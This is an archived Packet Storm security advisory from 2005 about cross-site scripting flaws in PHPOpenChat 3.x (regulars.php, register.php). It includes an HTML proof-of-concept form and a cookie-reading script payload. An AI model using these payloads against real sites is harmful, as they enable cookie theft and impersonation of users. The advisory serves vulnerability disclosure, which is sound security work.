what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpOpenChat.txt

phpOpenChat.txt
Posted Mar 22, 2005
Authored by Pi3cH

PHPOpenChat version 3.x is susceptible to multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | eb640f8cd71386f8b9bcd2ff6d49201c80d343e38dfeb94f3d88ebb58c229c92

phpOpenChat.txt

Change Mirror Download


[PersianHacker.NET 200503-09]PHPOpenChat v3.X XSS Multiple Vulnerability
Date: 2005 March
Bug Number: 09

PHPOpenChat
is a high performance php-based chat server software for a live chat-room or -module on every php-based site.
More info @:
http://phpopenchat.org/


Discussion:
--------------------
The software does not properly validate user-supplied input in 'regulars.php', 'register.php'.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PHPOpenChat software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.


Exploit:
--------------------
<html>
<head>
<title>PHPOpenChat v3.x XSS Exploit</title>
</head>
<body>
<h1>PHPOpenChat v3.x XSS Exploit</h1>
<form method="POST" action="http://www.example.com/regulars.php">
<b>XSS in regulars.php:</b><p>
<input type="text" name="chatter" size="48" value="XSS Injection Code"></p>
</p>
<p>exmple: <script>document.write(document.cookie)</script></p>
<p><input type="submit" style="width:80px" value="Excute" name="B1"></p>
</form>
<form method="POST" action="http://www.example.com/register.php">
<b>XSS in register.php:</b><p>
Nikname:
<input type="text" name="chatter" size="48" value="XSS Injection Code"></p>
<p>
Password:
<input type="text" name="chatter1" size="48" value="XSS Injection Code"></p>
<p>
FirstName LastName:
<input type="text" name="chatter2" size="48" value="XSS Injection Code"></p>
<p>
Email:
<input type="text" name="chatter3" size="48" value="XSS Injection Code"></p>
<p>
Url of picture:
<input type="text" name="chatter4" size="48" value="XSS Injection Code"></p>
</p>
<p>exmple: <script>document.write(document.cookie)</script></p>
<p><input type="submit" style="width:80px" value="Excute" name="B1"></p>
</form>
<p>&nbsp;</p>
<p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>
</body>
</html>


Solution:
--------------------
No solution was available at the time of this entry.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET

Special Thanks: devil_box(for xss article), amectris, herbod.


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net


Note
--------------------
This vulnerability reported to authors for solution, from bug report webform.
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close